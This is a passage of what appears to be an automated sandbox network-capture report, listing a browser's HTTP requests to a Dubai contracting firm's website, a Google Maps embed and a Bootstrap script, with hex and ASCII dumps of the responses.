                                              2024-09-27 06:19:45 UTC8000INData Raw: e5 6d ba d1 1a e5 35 14 6c c3 31 1d e8 ea b4 dc 39 0d c2 a8 eb aa 22 5d 9b 85 21 7e 61 88 28 f7 1c 82 fe bd b2 3a c7 de 2d f2 dc 79 15 d5 6d f3 cf d6 61 ca de 35 d9 52 09 70 6b c7 2d 44 7e 2c 9f 05 98 7c 84 8e 1d 36 54 9e e6 a4 53 39 1d 1a d4 85 e8 83 66 44 1d 70 84 d7 48 5c cf 9d 3b 0c 59 e3 ef b6 4b 5f 22 50 ea 16 f8 f0 0d 44 65 ac 88 89 1d d9 15 cd 51 25 35 0d 43 5d 4d 6a 8e 99 49 e4 55 55 91 51 61 78 c9 31 6c aa 82 5c 28 e9 54 91 ea a8 f3 95 8d 1d 1f 7a e3 f3 36 e6 35 8e 6f 22 21 62 c9 27 54 b3 c8 ce 37 33 1b 6f 3b 88 66 55 2d e6 5a 32 63 50 ce 54 57 99 aa 93 3e 82 bd 2b 6f 55 58 11 a5 18 48 b4 13 3d 5f fa a3 8b f6 b9 59 db 2d 1d 23 3b 05 be 85 f7 91 1c 3c 3a b7 5d 7a 04 6b 2c 91 29 0b 30 6d 5a 42 f1 b2 a9 1c 82 3e a3 df 46 ba 64 69 aa 8a b3 2a 51 88
                                              Data Ascii: m5l19"]!~a(:-yma5Rpk-D~,|6TS9fDpH\;YK_"PDeQ%5C]MjIUUQax1l\(Tz65o"!b'T73o;fU-Z2cPTW>+oUXH=_Y-#;<:]zk,)0mZB>Fdi*Q
                                              2024-09-27 06:19:45 UTC8000INData Raw: 88 16 6e a3 83 7f dd f5 44 ac ec 6a b0 0a f3 87 81 57 15 6f 07 95 67 95 a6 ab f7 82 d3 70 c7 c4 b4 ed c7 e4 55 4d 69 0a 11 6f 7e 35 0c af 02 ce 55 bb bf 1a ce 59 cb 38 2c e0 a0 66 62 5a 47 2c fc 76 af 29 5e 52 aa 78 1b a5 cb 48 d5 9e 39 45 11 97 fc 45 61 c6 78 d6 15 87 19 e3 d6 2a d2 ad 2b 38 e3 59 c5 5a 55 a5 5a 55 a5 5a 56 71 59 ee c6 b3 dd 8c ad 23 f9 45 69 5f ca 2b 4b 33 94 55 73 1e 7e 11 59 ee c6 ad 38 ff 00 dc 83 7f ff da 00 08 01 01 03 01 3f 21 ff 00 87 20 1d 20 fa e3 d7 07 73 7a 65 9b e6 83 87 d7 38 8f c1 c3 fa 68 06 8e d7 aa 32 3f 37 ab 8c 9b 29 f4 a7 db 27 1c 3e 8d 65 23 18 c5 01 f4 df 4c 61 c2 7f a2 af 18 1f 73 5f a1 0c 99 59 5c 7f c6 12 62 5d a1 a8 6b 9b bc 10 ba 23 f6 36 39 13 d2 c9 09 3b 3f 38 25 f8 1e 33 4e f8 3a 63 82 73 b5 8d 25 f1 9a 64
                                              Data Ascii: nDjWogpUMio~5UY8,fbZG,v)^RxH9EEax*+8YZUZUZVqY#Ei_+K3Us~Y8?! sze8h2?7)'>e#Las_Y\b]k#69;?8%3N:cs%d
                                              2024-09-27 06:19:45 UTC8000INData Raw: a6 4c f5 3f ce 7a f0 fb e3 85 0f 30 39 ed f1 8a 48 0b f8 f8 de 0e 6e 7b 3f 32 70 b7 1b e0 8f 8c 5d 3c 50 fd ef 09 65 13 92 37 aa 59 fe 6b 31 ed 6b 9f f3 39 40 ea 2c fd ba 31 26 40 ec e2 0d 99 ea 43 f3 66 42 88 4e c0 47 5c 77 3f 4c 2c 9e 9f 39 0f 3f b3 92 b2 5d ad 46 20 a3 3c 2f e0 c9 8a 5f 17 f7 0c e8 a7 c1 fb 22 b1 66 55 56 34 06 23 6f ab c6 45 e9 07 01 8e f3 e6 4f af 7c 0a 6e f5 f0 e5 51 6a 99 a5 8e c0 60 ba 76 5f 57 2c 4f d8 cd 9d 86 67 27 81 df 79 9b c9 f3 fb 0f dc 7e 73 fd 07 3f d8 73 db 7b bf 9c ff 00 55 c9 76 de 57 3f d8 73 fd 87 3f d8 70 2d 17 bb 9f ea 67 fb 9c 9b 6f 1a e2 fa e5 51 47 4a 3e 27 3d 6f f9 cf 51 fe 71 fa a6 7f bb 92 ed 3d d8 a6 df dd 8a bb 5f fe 9c bf ff 00 0f 2f ff da 00 08 01 02 03 01 3f 21 ff 00 f3 b8 3f ff da 00 08 01 03 03 01 3f
                                              Data Ascii: L?z09Hn{?2p]<Pe7Yk1k9@,1&@CfBNG\w?L,9?]F </_"fUV4#oEO|nQj`v_W,Og'y~s?s{UvW?s?p-goQGJ>'=oQq=_/?!??
                                              2024-09-27 06:19:45 UTC8000INData Raw: 6a 31 c6 1a ed 42 58 17 bd ce 01 86 a0 c5 dc 14 28 71 8f a5 e0 1a 30 a4 02 1f 4f 7f d8 74 88 11 76 a2 15 be 66 33 85 12 20 91 84 ce e2 a3 19 2c 2c 48 81 54 98 19 1c 1e 8a 95 b2 2a e2 05 38 fc e2 80 82 22 46 6a 65 dc ac 7d 30 0f 19 c4 52 c4 24 33 89 61 b7 2d 8f 4e 97 67 04 fa b3 04 39 84 98 ee c6 8c 22 c0 f0 f4 47 75 8a 51 41 1d 00 f3 15 ce 4d 50 0a 33 05 a2 51 63 8a 90 54 69 4b 13 34 48 17 84 9a 2a c1 32 81 51 df 22 b5 51 2e c5 9b ec c6 42 4d 1d 20 85 5e a3 71 e7 0a 40 a4 8a 24 b2 b7 ce 29 a0 45 51 05 41 8c c0 2a 21 54 4e a1 b9 81 c6 37 85 8c 84 87 1a 98 71 60 1d a4 a1 1d a4 58 98 c0 74 50 cb d6 4a 11 68 1f 8c 3a 85 ae 02 19 dd b4 fb e4 c8 82 54 6a d0 d4 ea 8c 09 82 11 90 1d db bc 20 bd c0 51 26 59 1f b7 39 58 90 94 c8 19 2d 69 84 f5 c0 8c 3f 8f c7 ec 29
                                              Data Ascii: j1BX(q0Otvf3 ,,HT*8"Fje}0R$3a-Ng9"GuQAMP3QcTiK4H*2Q"Q.BM ^q@$)EQA*!TN7q`XtPJh:Tj Q&Y9X-i?)
                                              2024-09-27 06:19:45 UTC4402INData Raw: 5d e5 ee b7 c3 40 a3 e0 97 44 e3 1b 4e 69 d8 e4 8c 0a 90 63 13 3a 86 26 72 3b 52 34 81 94 9c 56 13 a9 bf 37 b7 28 12 3c c2 e7 8d 74 c3 58 1f 23 5d 66 61 73 d8 45 4f c2 5b de 70 fa 8f f6 ac a7 12 f0 e2 b4 3e be 0c 44 f5 c8 d9 10 0c 8b 11 4c 9d 27 9c 86 c4 a4 49 b0 42 81 15 fa 61 83 40 04 a1 35 3e 8c ee 89 a8 88 ec 43 1c ff 00 dd 21 5d 4a 02 f6 84 17 fe 63 c5 98 2c 18 40 a5 f6 63 c2 40 e2 c9 73 44 bc 7d 71 93 0b c2 70 cc c3 85 4a e1 64 69 14 35 e1 5c a4 b0 df 00 4d c9 14 4b d3 ba 61 dc 6e 67 44 fd 33 9d dc c7 30 6f cd e1 6f b7 cb c9 73 92 6f a2 f6 3e f2 93 83 ba 76 6b b2 d7 7c 97 49 f3 f3 51 9d 5b 73 d7 5f d6 14 3e ad 5c 46 a7 57 87 52 be 41 06 30 8c 94 45 c9 d2 72 75 05 8c 0f 26 1b 79 ec 83 0e f6 bc 9c f1 79 2e cb eb bd 70 38 6d 75 e5 ec cc f1 96 e7 b4 12
                                              Data Ascii: ]@DNic:&r;R4V7(<tX#]fasEO[p>DL'IBa@5>C!]Jc,@c@sD}qpJdi5\MKangD30ooso>vk|IQ[s_>\FWRA0Eru&yy.p8mu


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.465338173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:45 UTC684OUTGET /images/captcha.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:45 UTC260INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:45 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Thu, 12 Jan 2023 18:18:41 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 2326
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:19:45 UTC2326INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 09 06 06 13 12 11 15 14 13 13 16 14 14 15 18 1e 16 19 18 18 16 20 16 1a 18 1d 17 1a 1f 1a 18 1e 14 1a 1a 1b 26 1e 1e 1c 23 1a 1e 1b 1f 2f 20 24 27 29 2c 2c 2c 17 20 31 35 32 2a 35 28 2b 2f 29 01 09 0a 0a 05 05 05 0d 05 05 0d 29 18 12 18 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ff c0 00 11 08 00 3d 00 c4 03 01 22 00 02 11 01 03 11 01 ff c4 00 1a 00 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 07 ff c4 00 34 10 00 01 02 04 04 04 05 03 04 02 03 01 00 00 00 00 01 02 11 00 03 21 31 12 41 51 f0 04 22 61 71 05 81 a1 b1 c1 13 91 f1 32 52 d1 e1 42 62 72 82 92 14
                                              Data Ascii: JFIF &#/ $'),,, 152*5(+/))))))))))))))))))))))))))))))))))))))))))))))))))))="4!1AQ"aq2RBbr


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.465336142.250.184.2284436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:45 UTC999OUTGET /maps/embed?pb=!1m14!1m8!1m3!1d7220.8946438946405!2d55.258405!3d25.188133!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x50df22dfd0d09b8f!2sCity%20Diamond%20Contracting%20LLC!5e0!3m2!1sen!2sus!4v1663058383351!5m2!1sen!2sus HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BGPbJzQE=
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: iframe
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:19:46 UTC739INHTTP/1.1 200 OK
                                              Pragma: no-cache
                                              Cache-Control: no-cache, must-revalidate
                                              X-Robots-Tag: noindex,nofollow
                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-_Lz1nczPs9Yj6ElS6R64BQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/geo-maps-api/1
                                              Content-Type: text/html; charset=UTF-8
                                              Vary: X-Origin
                                              Vary: Referer
                                              Date: Fri, 27 Sep 2024 06:19:46 GMT
                                              Server: scaffolding on HTTPServer2
                                              X-XSS-Protection: 0
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Accept-Ranges: none
                                              Vary: Origin,Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2024-09-27 06:19:46 UTC651INData Raw: 65 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 6d 61 70 44 69 76 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6d 61 70 44 69 76 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 5f 4c 7a 31 6e 63 7a
                                              Data Ascii: e10<!DOCTYPE html><html> <head> <style type="text/css"> html, body, #mapDiv { height: 100%; margin: 0; padding: 0; } </style> </head> <body> <div id="mapDiv"></div> <script nonce="_Lz1ncz
                                              2024-09-27 06:19:46 UTC1390INData Raw: 62 74 68 36 66 37 78 22 2c 6e 75 6c 6c 2c 5b 32 35 31 38 38 31 33 33 33 2c 35 35 32 35 38 34 30 35 30 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 67 63 69 64 3a 67 65 6e 65 72 61 6c 5f 63 6f 6e 74 72 61 63 74 6f 72 22 5d 2c 30 2c 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 30 5d 5d 5d 5d 2c 6e 75 6c 6c 2c 5b 22 65 6e 22 2c 22 75 73 22 5d 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 2f 6d 61 70 73 2f 61 70 69 2f 6a 73 2f 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 69 63 65 2e 47 65 74 45 6e 74 69 74 79 44 65 74 61 69 6c 73 22 2c 22 2f 6d 61 70 73 2f 65 6d 62 65 64 2f 75 70 67 72 61 64 65 32 30 34 22 2c 6e 75 6c 6c 2c 22
                                              Data Ascii: bth6f7x",null,[251881333,552584050],null,null,null,null,null,null,null,null,null,null,"gcid:general_contractor"],0,0,null,null,0,null,0]]]],null,["en","us"],[null,null,null,"/maps/api/js/ApplicationService.GetEntityDetails","/maps/embed/upgrade204",null,"
                                              2024-09-27 06:19:46 UTC1390INData Raw: 4b 49 41 78 56 61 33 51 49 48 48 58 4a 57 46 33 59 51 71 74 4d 42 43 41 30 6f 43 67 22 2c 5b 22 37 48 51 51 35 37 51 35 2b 37 39 22 5d 2c 5b 22 35 37 51 35 2b 37 39 20 44 75 62 61 69 20 2d 20 55 6e 69 74 65 64 20 41 72 61 62 20 45 6d 69 72 61 74 65 73 22 5d 2c 32 5d 2c 5b 5b 5b 22 46 72 69 64 61 79 22 2c 35 2c 5b 32 30 32 34 2c 39 2c 32 37 5d 2c 5b 5b 22 38 3a 33 30 e2 80 af 41 4d e2 80 93 36 e2 80 af 50 4d 22 2c 5b 5b 38 2c 33 30 5d 2c 5b 31 38 5d 5d 5d 5d 2c 30 2c 31 5d 2c 5b 22 53 61 74 75 72 64 61 79 22 2c 36 2c 5b 32 30 32 34 2c 39 2c 32 38 5d 2c 5b 5b 22 38 3a 33 30 e2 80 af 41 4d e2 80 93 36 e2 80 af 50 4d 22 2c 5b 5b 38 2c 33 30 5d 2c 5b 31 38 5d 5d 5d 5d 2c 30 2c 31 5d 2c 5b 22 53 75 6e 64 61 79 22 2c 37 2c 5b 32 30 32 34 2c 39 2c 32 39 5d 2c 5b
                                              Data Ascii: KIAxVa3QIHHXJWF3YQqtMBCA0oCg",["7HQQ57Q5+79"],["57Q5+79 Dubai - United Arab Emirates"],2],[[["Friday",5,[2024,9,27],[["8:30AM6PM",[[8,30],[18]]]],0,1],["Saturday",6,[2024,9,28],[["8:30AM6PM",[[8,30],[18]]]],0,1],["Sunday",7,[2024,9,29],[
                                              2024-09-27 06:19:46 UTC176INData Raw: 73 3d 67 65 6f 6d 65 74 72 79 2c 73 65 61 72 63 68 26 61 6d 70 3b 76 3d 77 65 65 6b 6c 79 26 61 6d 70 3b 6c 6f 61 64 69 6e 67 3d 61 73 79 6e 63 26 61 6d 70 3b 6c 61 6e 67 75 61 67 65 3d 65 6e 26 61 6d 70 3b 72 65 67 69 6f 6e 3d 75 73 26 61 6d 70 3b 63 61 6c 6c 62 61 63 6b 3d 6f 6e 41 70 69 4c 6f 61 64 22 20 6e 6f 6e 63 65 3d 22 5f 4c 7a 31 6e 63 7a 50 73 39 59 6a 36 45 6c 53 36 52 36 34 42 51 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                              Data Ascii: s=geometry,search&amp;v=weekly&amp;loading=async&amp;language=en&amp;region=us&amp;callback=onApiLoad" nonce="_Lz1nczPs9Yj6ElS6R64BQ" async defer></script> </body></html>
                                              2024-09-27 06:19:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              51192.168.2.465344173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:45 UTC434OUTGET /js/bootstrap.bundle.min.js HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:45 UTC273INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:45 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:20:46 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 78129
                                              Connection: close
                                              Content-Type: application/javascript
                                              2024-09-27 06:19:45 UTC7919INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62
                                              Data Ascii: /*! * Bootstrap v5.1.3 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,e){"ob
                                              2024-09-27 06:19:45 UTC8000INData Raw: 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 57 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 68 69 73 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 5b 74 5d 7c 7c 74 2e 73 74 61 72 74 73 57 69 74 68 28 22 5f 22 29 7c 7c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 3d 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 24 7b 74 7d 22 60 29 3b 65 5b 74 5d 28 74 68 69 73 29 7d 7d 29 29 7d 7d 52 28 57 2c 22 63 6c 6f 73 65 22 29 2c 67 28 57 29 3b 63 6f 6e 73 74 20 24 3d 27 5b 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 62 75 74 74 6f 6e 22
                                              Data Ascii: eturn this.each((function(){const e=W.getOrCreateInstance(this);if("string"==typeof t){if(void 0===e[t]||t.startsWith("_")||"constructor"===t)throw new TypeError(`No method named "${t}"`);e[t](this)}}))}}R(W,"close"),g(W);const $='[data-bs-toggle="button"
                                              2024-09-27 06:19:45 UTC8000INData Raw: 63 20 63 61 72 6f 75 73 65 6c 49 6e 74 65 72 66 61 63 65 28 74 2c 65 29 7b 63 6f 6e 73 74 20 69 3d 73 74 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 2c 65 29 3b 6c 65 74 7b 5f 63 6f 6e 66 69 67 3a 6e 7d 3d 69 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 6e 3d 7b 2e 2e 2e 6e 2c 2e 2e 2e 65 7d 29 3b 63 6f 6e 73 74 20 73 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 3a 6e 2e 73 6c 69 64 65 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 29 69 2e 74 6f 28 65 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 73 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 69 5b 73 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 4e 6f 20 6d 65 74 68 6f
                                              Data Ascii: c carouselInterface(t,e){const i=st.getOrCreateInstance(t,e);let{_config:n}=i;"object"==typeof e&&(n={...n,...e});const s="string"==typeof e?e:n.slide;if("number"==typeof e)i.to(e);else if("string"==typeof s){if(void 0===i[s])throw new TypeError(`No metho
                                              2024-09-27 06:19:45 UTC8000INData Raw: 5d 2e 69 6e 64 65 78 4f 66 28 6e 2e 77 69 6c 6c 43 68 61 6e 67 65 29 7c 7c 65 26 26 22 66 69 6c 74 65 72 22 3d 3d 3d 6e 2e 77 69 6c 6c 43 68 61 6e 67 65 7c 7c 65 26 26 6e 2e 66 69 6c 74 65 72 26 26 22 6e 6f 6e 65 22 21 3d 3d 6e 2e 66 69 6c 74 65 72 29 72 65 74 75 72 6e 20 69 3b 69 3d 69 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 74 29 7c 7c 65 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 74 29 7b 72 65 74 75 72 6e 5b 22 74 6f 70 22 2c 22 62 6f 74 74 6f 6d 22 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3e 3d 30 3f 22 78 22 3a 22 79 22 7d 76 61 72 20 69 65 3d 4d 61 74 68 2e 6d 61 78 2c 6e 65 3d 4d 61 74 68 2e 6d 69 6e 2c 73 65 3d 4d 61 74 68 2e 72 6f 75 6e 64 3b 66 75 6e 63 74 69 6f 6e 20 6f 65 28 74 2c 65 2c 69 29 7b 72 65 74 75 72 6e 20
                                              Data Ascii: ].indexOf(n.willChange)||e&&"filter"===n.willChange||e&&n.filter&&"none"!==n.filter)return i;i=i.parentNode}return null}(t)||e}function ee(t){return["top","bottom"].indexOf(t)>=0?"x":"y"}var ie=Math.max,ne=Math.min,se=Math.round;function oe(t,e,i){return
                                              2024-09-27 06:19:45 UTC8000INData Raw: 28 21 65 2e 6d 6f 64 69 66 69 65 72 73 44 61 74 61 5b 6e 5d 2e 5f 73 6b 69 70 29 7b 66 6f 72 28 76 61 72 20 73 3d 69 2e 6d 61 69 6e 41 78 69 73 2c 6f 3d 76 6f 69 64 20 30 3d 3d 3d 73 7c 7c 73 2c 72 3d 69 2e 61 6c 74 41 78 69 73 2c 61 3d 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 72 2c 6c 3d 69 2e 66 61 6c 6c 62 61 63 6b 50 6c 61 63 65 6d 65 6e 74 73 2c 63 3d 69 2e 70 61 64 64 69 6e 67 2c 68 3d 69 2e 62 6f 75 6e 64 61 72 79 2c 64 3d 69 2e 72 6f 6f 74 42 6f 75 6e 64 61 72 79 2c 75 3d 69 2e 61 6c 74 42 6f 75 6e 64 61 72 79 2c 66 3d 69 2e 66 6c 69 70 56 61 72 69 61 74 69 6f 6e 73 2c 70 3d 76 6f 69 64 20 30 3d 3d 3d 66 7c 7c 66 2c 6d 3d 69 2e 61 6c 6c 6f 77 65 64 41 75 74 6f 50 6c 61 63 65 6d 65 6e 74 73 2c 67 3d 65 2e 6f 70 74 69 6f 6e 73 2e 70 6c 61 63 65 6d 65 6e
                                              Data Ascii: (!e.modifiersData[n]._skip){for(var s=i.mainAxis,o=void 0===s||s,r=i.altAxis,a=void 0===r||r,l=i.fallbackPlacements,c=i.padding,h=i.boundary,d=i.rootBoundary,u=i.altBoundary,f=i.flipVariations,p=void 0===f||f,m=i.allowedAutoPlacements,g=e.options.placemen
                                              2024-09-27 06:19:45 UTC8000INData Raw: 72 72 6f 77 44 6f 77 6e 22 2c 51 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 41 72 72 6f 77 55 70 7c 41 72 72 6f 77 44 6f 77 6e 7c 45 73 63 61 70 65 22 29 2c 47 65 3d 22 63 6c 69 63 6b 2e 62 73 2e 64 72 6f 70 64 6f 77 6e 2e 64 61 74 61 2d 61 70 69 22 2c 5a 65 3d 22 6b 65 79 64 6f 77 6e 2e 62 73 2e 64 72 6f 70 64 6f 77 6e 2e 64 61 74 61 2d 61 70 69 22 2c 4a 65 3d 22 73 68 6f 77 22 2c 74 69 3d 27 5b 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 5d 27 2c 65 69 3d 22 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 2c 69 69 3d 6d 28 29 3f 22 74 6f 70 2d 65 6e 64 22 3a 22 74 6f 70 2d 73 74 61 72 74 22 2c 6e 69 3d 6d 28 29 3f 22 74 6f 70 2d 73 74 61 72 74 22 3a 22 74 6f 70 2d 65 6e 64 22 2c 73 69 3d 6d 28 29 3f 22 62 6f 74 74 6f 6d 2d 65
                                              Data Ascii: rrowDown",Qe=new RegExp("ArrowUp|ArrowDown|Escape"),Ge="click.bs.dropdown.data-api",Ze="keydown.bs.dropdown.data-api",Je="show",ti='[data-bs-toggle="dropdown"]',ei=".dropdown-menu",ii=m()?"top-end":"top-start",ni=m()?"top-start":"top-end",si=m()?"bottom-e
